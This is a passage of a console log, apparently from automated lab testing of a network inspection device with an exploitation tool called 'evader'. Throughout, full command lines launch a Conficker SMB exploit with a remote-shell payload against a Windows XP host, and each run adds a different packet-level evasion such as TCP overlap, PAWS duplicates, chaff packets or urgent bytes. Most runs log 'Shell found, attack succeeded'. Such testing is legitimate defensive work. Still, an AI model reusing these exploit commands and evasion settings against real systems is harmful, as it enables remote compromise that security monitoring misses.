790. - 25% probability to add a random alphaurgent data byte to a TCP segment.
791. The following evasions are applied from stage smb_opentree to msrpc_req:
792. - Add a zero urgent data byte to every 2 TCP segment.
793. The following evasions are applied from stage smb_opentree to msrpc_bind:
794. - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
795.  
796. Info: NetBIOS connection 10.62.90.110:29321 -> 10.35.1.207:445
797. Terminated
798. ..........
799. 27753 runs averaging 1.77 runs / second ; progress: 15710/43200.............
800. 27766 runs averaging 1.77 runs / second ; progress: 15715/43200...Pid 1432 timed out - killed
801. 2015-11-29 18:47:49 INFO
802. Timed out (10.62.90.113):
803. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12055 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=xV8Qwg+e8qU --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"13","small_unspec|http_post" --evasion=[smb_openpipe,end]tcp_paws,"75%","1","random_alphanum" --verifydelay=1000 --payload=shell
804. Info: Using random seed xV8Qwg+e8qX
805. The following evasions are applied from stage smb_openpipe to end:
806. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random alphanumeric bytes as payload
807. The following evasions are applied from stage smb_openpipe to msrpc_bind:
808. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
809.  
810. Info: NetBIOS connection 10.62.90.113:12055 -> 10.35.1.207:445
811. Terminated
812. .
813. 27771 runs averaging 1.77 runs / second ; progress: 15720/43200.
814. 27772 runs averaging 1.77 runs / second ; progress: 15725/43200....2015-11-29 18:47:59 INFO
815. Success. (10.62.90.117):
816. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51361 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=9FEgSgu5vcw --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","2","3","random" --evasion=[smb_opentree,end]tcp_paws,"5","8","random_alphanum" --verifydelay=1000 --payload=shell
817. Info: Using random seed 9FEgSgu5vcz
818. The following evasions are applied from stage smb_opentree to end:
819. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
820. The following evasions are applied from stage smb_openpipe to msrpc_req:
821. - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random bytes.
822.  
823. Info: NetBIOS connection 10.62.90.117:51361 -> 10.35.1.207:445
824. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
825. Info: Sending MSRPC request with exploit
826. Info: Shell found, attack succeeded
827. Info: Shell closed
828. 0: Success.
829. .....
830. 27782 runs averaging 1.77 runs / second ; progress: 15730/43200....................
831. 27802 runs averaging 1.77 runs / second ; progress: 15735/43200...................2015-11-29 18:48:09 INFO
832. Success. (10.62.90.111):
833. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58603 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=zQrV9wU4W2Q --evasion=[smb_connect,end]smb_decoytrees,"2","6","2","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_overlap,"774","new","random_alphanum" --verifydelay=1000 --payload=shell
834. Info: Using random seed zQrV9wU4W2T
835. The following evasions are applied from stage smb_connect to end:
836. - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
837. The following evasions are applied from stage smb_openpipe to end:
838. - TCP segments are set to overlap by 774 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
839.  
840. Info: NetBIOS connection 10.62.90.111:58603 -> 10.35.1.207:445
841. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
842. Info: Sending MSRPC request with exploit
843. Info: Shell found, attack succeeded
844. Info: Shell closed
845. 0: Success.
846. ...
847. 27825 runs averaging 1.77 runs / second ; progress: 15740/43200.2015-11-29 18:48:11 INFO
848. Success. (10.62.90.113):
849. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58902 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=GGyhVeoye7M --evasion=[smb_connect,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","zero" --evasion=[start,end]tcp_paws,"3","36687720","alpharandomized" --verifydelay=1000 --payload=shell
850. Info: Using random seed GGyhVeoye7M
851. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 36687720> and has original payload with alphabetic bytes randomized
852. The following evasions are applied from stage smb_connect to msrpc_bind:
853. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
854. * Invalid TCP checksum.
855. * NULL TCP control flags.
856. * An out-of-window sequence number.
857. * TCP header shorter than 20 bytes
858. * TCP header longer than packet total size
859. * Duplicate packet has 0x00 bytes as payload
860.  
861. Info: NetBIOS connection 10.62.90.113:58902 -> 10.35.1.207:445
862. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
863. Info: Sending MSRPC request with exploit
864. Info: Shell found, attack succeeded
865. Info: Shell closed
866. 0: Success.
867. .........
868. 27836 runs averaging 1.77 runs / second ; progress: 15745/43200......
869. 27842 runs averaging 1.77 runs / second ; progress: 15750/43200.2015-11-29 18:48:22 INFO
870. Success. (10.62.90.110):
871. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62003 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6hxXZxV/TQc --evasion=[netbios_connect,smb_opentree]tcp_chaff,"21","outofwindow|longhdr","shuffle" --evasion=[start,msrpc_req]tcp_paws,"50%","257032956","alpharandomized" --verifydelay=1000 --payload=shell
872. Info: Using random seed 6hxXZxV/TQf
873. The following evasions are applied from stage start to msrpc_req:
874. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 257032956> and has original payload with alphabetic bytes randomized
875. The following evasions are applied from stage netbios_connect to smb_opentree:
876. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
877. * An out-of-window sequence number.
878. * TCP header longer than packet total size
879. * Duplicate packet has shuffled original payload
880.  
881. Info: NetBIOS connection 10.62.90.110:62003 -> 10.35.1.207:445
882. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
883. Info: Sending MSRPC request with exploit
884. Info: Shell found, attack succeeded
885. Info: CommandShell::SendCommand() - Failed to send string
886. Info: Command shell connection reset.
887. Info: Shell closed
888. 0: Success.
889. ..........
890. 27854 runs averaging 1.77 runs / second ; progress: 15755/43200..........
891. 27864 runs averaging 1.77 runs / second ; progress: 15760/43200.........
892. 27873 runs averaging 1.77 runs / second ; progress: 15765/43200......2015-11-29 18:48:39 INFO
893. Success. (10.62.90.113):
894. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17936 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=4nL4a4IvLH0 --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","3","random_alphanum" --evasion=[smb_connect,smb_openpipe]tcp_seg,"9" --verifydelay=1000 --payload=shell
895. Info: Using random seed 4nL4a4IvLH3
896. The following evasions are applied from stage netbios_connect to msrpc_req:
897. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
898. The following evasions are applied from stage smb_connect to smb_openpipe:
899. - TCP packets are segmented to contain at most 9 bytes of payload.
900.  
901. Info: NetBIOS connection 10.62.90.113:17936 -> 10.35.1.207:445
902. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
903. Info: Sending MSRPC request with exploit
904. Info: Shell found, attack succeeded
905. Info: Shell closed
906. 0: Success.
907. ....
908. 27884 runs averaging 1.77 runs / second ; progress: 15770/43200.............
909. 27897 runs averaging 1.77 runs / second ; progress: 15775/43200...................
910. 27916 runs averaging 1.77 runs / second ; progress: 15780/43200......2015-11-29 18:48:54 INFO
911. Success. (10.62.90.117):
912. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10147 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QPbox6bWoBI --evasion=[smb_connect,end]tcp_overlap,"1479","new","random" --evasion=[netbios_connect,end]tcp_paws,"25%","215976190","alpharandomized" --verifydelay=1000 --payload=shell
913. Info: Using random seed QPbox6bWoBJ
914. The following evasions are applied from stage netbios_connect to end:
915. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215976190> and has original payload with alphabetic bytes randomized
916. The following evasions are applied from stage smb_connect to end:
917. - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
918.  
919. Info: NetBIOS connection 10.62.90.117:10147 -> 10.35.1.207:445
920. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
921. Info: Sending MSRPC request with exploit
922. Info: Shell found, attack succeeded
923. Info: CommandShell::SendCommand() - Failed to send string
924. Info: Command shell connection reset.
925. Info: Shell closed
926. 0: Success.
927. ..
928. 27925 runs averaging 1.77 runs / second ; progress: 15785/43200....2015-11-29 18:48:58 INFO
929. Success. (10.62.90.117):
930. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=4Fl3WpOMNK8 --evasion=[start,msrpc_req]tcp_paws,"75%","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
931. Info: Using random seed 4Fl3WpOMNK/
932. The following evasions are applied from stage start to msrpc_req:
933. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
934. The following evasions are applied from stage msrpc_req to end:
935. - TCP timestamps echo reply value is sent in the wrong endianness
936.  
937. Info: NetBIOS connection 10.62.90.117:52189 -> 10.35.1.207:445
938. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
939. Info: Sending MSRPC request with exploit
940. Info: Shell found, attack succeeded
941. Info: Shell closed
942. 0: Success.
943. .....2015-11-29 18:49:00 INFO
944. Success. (10.62.90.117):
945. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56280 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=JDm6ToN1zLk --evasion=[smb_connect,end]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","117704364","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"7" --verifydelay=1000 --payload=shell
946. Info: Using random seed JDm6ToN1zLk
947. The following evasions are applied from stage netbios_connect to end:
948. - TCP receive window is set to at most 7 bytes.
949. The following evasions are applied from stage smb_connect to end:
950. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
951. The following evasions are applied from stage smb_openpipe to msrpc_req:
952. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117704364> and has shuffled original payload
953.  
954. Info: NetBIOS connection 10.62.90.117:56280 -> 10.35.1.207:445
955. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
956. Info: Sending MSRPC request with exploit
957. Info: Shell found, attack succeeded
958. Info: Shell closed
959. 0: Success.
960. ..
961. 27938 runs averaging 1.77 runs / second ; progress: 15790/43200................
962. 27954 runs averaging 1.77 runs / second ; progress: 15796/43200..........
963. 27964 runs averaging 1.77 runs / second ; progress: 15801/43200..
964. 27966 runs averaging 1.77 runs / second ; progress: 15806/43200
965. 27966 runs averaging 1.77 runs / second ; progress: 15811/43200........
966. 27974 runs averaging 1.77 runs / second ; progress: 15816/43200......2015-11-29 18:49:31 INFO
967. Success. (10.62.90.112):
968. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34127 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=EwCILbJtpug --evasion=[start,smb_openpipe]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_opentree,end]tcp_paws,"50%","101597375","random_alpha" --verifydelay=1000 --payload=shell
969. Info: Using random seed EwCILbJtpug
970. The following evasions are applied from stage start to smb_openpipe:
971. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
972. The duplicate packet has random alphanumeric bytes as payload
973. The following evasions are applied from stage smb_opentree to end:
974. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 101597375> and has random alpha bytes as payload
975.  
976. Info: NetBIOS connection 10.62.90.112:34127 -> 10.35.1.207:445
977. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
978. Info: Sending MSRPC request with exploit
979. Info: Shell found, attack succeeded
980. Info: CommandShell::SendCommand() - Failed to send string
981. Info: Command shell connection reset.
982. Info: Shell closed
983. 0: Success.
984.  
985. 27981 runs averaging 1.77 runs / second ; progress: 15821/43200..
986. 27983 runs averaging 1.77 runs / second ; progress: 15826/43200...
987. 27986 runs averaging 1.77 runs / second ; progress: 15831/43200.......
988. 27993 runs averaging 1.77 runs / second ; progress: 15836/43200.............2015-11-29 18:49:51 INFO
989. Success. (10.62.90.110):
990. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56329 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xqffTOxhPHs --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","chksum|nullchksum|outofwindow","shuffle30" --evasion=[smb_opentree,end]tcp_paws,"3","268435455","random" --verifydelay=1000 --payload=shell
991. Info: Using random seed xqffTOxhPHv
992. The following evasions are applied from stage smb_opentree to smb_openpipe:
993. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
994. * Invalid TCP checksum.
995. * NULL TCP checksum.
996. * An out-of-window sequence number.
997. * Duplicate packet has 30 bytes of original payload, then shuffled original payload
998. The following evasions are applied from stage smb_opentree to end:
999. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
1000.  
1001. Info: NetBIOS connection 10.62.90.110:56329 -> 10.35.1.207:445
1002. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1003. Info: Sending MSRPC request with exploit
1004. Info: Shell found, attack succeeded
1005. Info: Shell closed
1006. 0: Success.
1007. .
1008. 28008 runs averaging 1.77 runs / second ; progress: 15841/43200...2015-11-29 18:49:52 INFO
1009. Success. (10.62.90.110):
1010. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18237 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6JjWlAliJfs --evasion=[netbios_connect,smb_connect]netbios_chaff,"50%","http_post" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
1011. Info: Using random seed 6JjWlAliJfv
1012. The following evasions are applied from stage netbios_connect to smb_connect:
1013. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
1014. The following evasions are applied from stage msrpc_bind to end:
1015. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
1016.  
1017. Info: NetBIOS connection 10.62.90.110:18237 -> 10.35.1.207:445
1018. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1019. Info: Sending MSRPC request with exploit
1020. Info: Shell found, attack succeeded
1021. Info: Shell closed
1022. 0: Success.
1023. .....2015-11-29 18:49:54 INFO
1024. Success. (10.62.90.117):
1025. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49837 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkN3JKTYqig --evasion=[start,msrpc_req]tcp_paws,"2","3","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","9","alphanumrandomized" --verifydelay=1000 --payload=shell
1026. Info: Using random seed QkN3JKTYqih
1027. The following evasions are applied from stage start to msrpc_req:
1028. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
1029. The following evasions are applied from stage netbios_connect to smb_opentree:
1030. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
1031.  
1032. Info: NetBIOS connection 10.62.90.117:49837 -> 10.35.1.207:445
1033. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1034. Info: Sending MSRPC request with exploit
1035. Info: Shell found, attack succeeded
1036. Info: Shell closed
1037. 0: Success.
1038. .......
1039. 28025 runs averaging 1.77 runs / second ; progress: 15846/43200.............
1040. 28038 runs averaging 1.77 runs / second ; progress: 15851/43200...........
1041. 28049 runs averaging 1.77 runs / second ; progress: 15856/43200..........
1042. 28059 runs averaging 1.77 runs / second ; progress: 15861/43200.........
1043. 28068 runs averaging 1.77 runs / second ; progress: 15866/43200..
1044. 28070 runs averaging 1.77 runs / second ; progress: 15871/43200
1045. 28070 runs averaging 1.77 runs / second ; progress: 15876/43200Pid 5217 timed out - killed
1046. 2015-11-29 18:50:28 INFO
1047. Timed out (10.62.90.115):
1048. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19081 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=iIUPNOtp5Ls --evasion=[smb_connect,end]tcp_chaff,"13","longhdr","random" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
1049. Info: Using random seed iIUPNOtp5Lu
1050. The following evasions are applied from stage smb_connect to end:
1051. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
1052. * TCP header longer than packet total size
1053. * Duplicate packet has random bytes as payload
1054. The following evasions are applied from stage smb_openpipe to end:
1055. - Add a random urgent data byte to every 1 TCP segment.
1056.  
1057. Info: NetBIOS connection 10.62.90.115:19081 -> 10.35.1.207:445
1058. Terminated
1059.  
1060. 28071 runs averaging 1.77 runs / second ; progress: 15881/43200.....
1061. 28076 runs averaging 1.77 runs / second ; progress: 15886/43200.....
1062. 28081 runs averaging 1.77 runs / second ; progress: 15891/43200......2015-11-29 18:50:45 INFO
1063. Success. (10.62.90.110):
1064. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50648 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=f19n/w1BjR8 --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","5","2047","random" --evasion=[msrpc_bind,end]tcp_paws,"1","33510158","random_alpha" --verifydelay=1000 --payload=shell
1065. Info: Using random seed f19n/w1BjR9
1066. The following evasions are applied from stage smb_openpipe to msrpc_bind:
1067. - Before normal SMB writes, 4 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 random bytes.
1068. The following evasions are applied from stage msrpc_bind to end:
1069. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33510158> and has random alpha bytes as payload
1070.  
1071. Info: NetBIOS connection 10.62.90.110:50648 -> 10.35.1.207:445
1072. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1073. Info: Sending MSRPC request with exploit
1074. Info: Shell found, attack succeeded
1075. Info: Shell closed
1076. 0: Success.
1077. ..
1078. 28090 runs averaging 1.77 runs / second ; progress: 15896/432002015-11-29 18:50:51 INFO
1079. Success. (10.62.90.110):
1080. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26041 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sl7m0GwAntw --evasion=[smb_connect,msrpc_bind]ipv4_opt,"5","inc","random_alphanum" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","2","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"6","5","4","random" --verifydelay=1000 --payload=shell
1081. Info: Using random seed sl7m0GwAnty
1082. The following evasions are applied from stage smb_connect to msrpc_bind:
1083. - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
1084. The duplicate packet has random alphanumeric bytes as payload
1085. The following evasions are applied from stage smb_connect to msrpc_req:
1086. - Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
1087. The following evasions are applied from stage smb_openpipe to msrpc_req:
1088. - Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 4 random bytes.
1089.  
1090. Info: NetBIOS connection 10.62.90.110:26041 -> 10.35.1.207:445
1091. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1092. Info: Sending MSRPC request with exploit
1093. Info: Shell found, attack succeeded
1094. Info: CommandShell::SendCommand() - Failed to send string
1095. Info: Command shell connection reset.
1096. Info: Shell closed
1097. 0: Success.
1098.  
1099. 28091 runs averaging 1.77 runs / second ; progress: 15901/43200.....
1100. 28096 runs averaging 1.77 runs / second ; progress: 15906/43200.......
1101. 28103 runs averaging 1.77 runs / second ; progress: 15911/43200........
1102. 28111 runs averaging 1.77 runs / second ; progress: 15916/43200
1103. 28111 runs averaging 1.77 runs / second ; progress: 15921/43200
1104. 28111 runs averaging 1.77 runs / second ; progress: 15926/43200...
1105. 28114 runs averaging 1.76 runs / second ; progress: 15931/43200....
1106. 28118 runs averaging 1.76 runs / second ; progress: 15936/43200...2015-11-29 18:51:31 INFO
1107. Success. (10.62.90.110):
1108. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63136 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=HrVWX3wtaqA --evasion=[smb_connect,smb_opentree]smb_chaff,"2","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","170135684","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"3","random" --verifydelay=1000 --payload=shell
1109. Info: Using random seed HrVWX3wtaqA
1110. The following evasions are applied from stage smb_connect to smb_opentree:
1111. - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
1112. The following evasions are applied from stage smb_opentree to msrpc_req:
1113. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 170135684> and has random bytes as payload
1114. The following evasions are applied from stage msrpc_bind to msrpc_req:
1115. - Add a random urgent data byte to every 3 TCP segment.
1116.  
1117. Info: NetBIOS connection 10.62.90.110:63136 -> 10.35.1.207:445
1118. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1119. Info: Sending MSRPC request with exploit
1120. Info: Shell found, attack succeeded
1121. Info: Shell closed
1122. 0: Success.
1123. .
1124. 28123 runs averaging 1.76 runs / second ; progress: 15941/43200......
1125. 28129 runs averaging 1.76 runs / second ; progress: 15946/43200.Pid 6900 timed out - killed
1126. 2015-11-29 18:51:38 INFO
1127. Timed out (10.62.90.118):
1128. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51735 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=yAsyNYuc8v4 --evasion=[msrpc_bind,msrpc_req]smb_chaff,"2","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","562","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
1129. Info: Using random seed yAsyNYuc8v7
1130. The following evasions are applied from stage smb_connect to end:
1131. - 25% probability to add a random alphaurgent data byte to a TCP segment.
1132. The following evasions are applied from stage smb_opentree to msrpc_req:
1133. - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 562 random alphanumeric bytes.
1134. The following evasions are applied from stage msrpc_bind to msrpc_req:
1135. - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
1136.  
1137. Info: NetBIOS connection 10.62.90.118:51735 -> 10.35.1.207:445
1138. Terminated
1139. ......
1140. 28137 runs averaging 1.76 runs / second ; progress: 15951/43200Pid 6977 timed out - killed
1141. 2015-11-29 18:51:44 INFO
1142. Timed out (10.62.90.114):
1143. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47476 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=isRm9W2VVvw --evasion=[start,netbios_connect]tcp_paws,"1","2","alpharandomized" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
1144. Info: Using random seed isRm9W2VVvy
1145. The following evasions are applied from stage start to netbios_connect:
1146. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
1147. The following evasions are applied from stage smb_openpipe to end:
1148. - 75% probability to add a random urgent data byte to a TCP segment.
1149.  
1150. Info: NetBIOS connection 10.62.90.114:47476 -> 10.35.1.207:445
1151. Terminated
1152. ....
1153. 28142 runs averaging 1.76 runs / second ; progress: 15956/43200
1154. 28142 runs averaging 1.76 runs / second ; progress: 15961/43200Pid 7270 timed out - killed
1155. 2015-11-29 18:51:53 INFO
1156. Timed out (10.62.90.119):
1157. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58090 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Hgg7DheMpXo --evasion=[smb_opentree,msrpc_req]tcp_chaff,"2","chksum|nullchksum|nullflag","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_chaff,"3","chksum|nullchksum|nullflag|outofwindow|shorthdr","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
1158. Info: Using random seed Hgg7DheMpXo
1159. The following evasions are applied from stage smb_opentree to msrpc_req:
1160. - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
1161. * Invalid TCP checksum.
1162. * NULL TCP checksum.
1163. * NULL TCP control flags.
1164. * Duplicate packet has original payload with alphanumeric bytes randomized
1165. The following evasions are applied from stage smb_openpipe to end:
1166. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
1167. * Invalid TCP checksum.
1168. * NULL TCP checksum.
1169. * NULL TCP control flags.
1170. * An out-of-window sequence number.
1171. * TCP header shorter than 20 bytes
1172. * Duplicate packet has random alphanumeric bytes as payload
1173. - 50% probability to add a zero urgent data byte to a TCP segment.
1174.  
1175. Info: NetBIOS connection 10.62.90.119:58090 -> 10.35.1.207:445
1176. Terminated
1177. Pid 7300 timed out - killed
1178. 2015-11-29 18:51:54 INFO
1179. Timed out (10.62.90.116):
1180. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13639 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=QiqTvuFtUiA --evasion=[smb_opentree,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
